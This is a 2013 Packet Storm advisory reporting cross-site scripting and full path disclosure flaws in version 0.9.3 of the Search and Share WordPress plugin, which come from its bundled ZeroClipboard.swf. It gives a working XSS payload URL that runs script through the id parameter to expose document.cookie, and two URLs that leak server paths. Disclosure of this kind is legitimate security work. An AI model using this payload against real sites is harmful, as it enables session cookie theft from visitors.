WordPress Search And Share 0.9.3 Cross Site Scripting

2013-05-12T00:00:00
ID PACKETSTORM:121595
Type packetstorm
Reporter MustLive
Modified 2013-05-12T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to inform you about vulnerabilities in Search and Share plugin for  
WordPress.  
  
These are Cross-Site Scripting and Full path disclosure vulnerabilities.  
These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In  
February I've wrote about Cross-Site Scripting vulnerabilities in  
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in  
multiple web applications.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Search and Share 0.9.3 and previous versions.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Latent Motion  
http://www.latentmotion.com  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
XSS via id parameter and XSS via copying payload into clipboard.  
  
http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/plugins/search-and-share/SearchAndShare.php  
  
http://site/wp-content/plugins/search-and-share/error_log (leakage of full  
paths at web sites where showing errors is off and they are saving into  
error_log)  
  
------------  
Timeline:  
------------   
  
2013.02.18 - informed old and new developers of ZeroClipboard.  
2013.03.26 - announced at my site.  
2013.03.27 - informed developers of Search and Share.  
2013.05.11 - disclosed at my site (http://websecurity.com.ua/6394/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`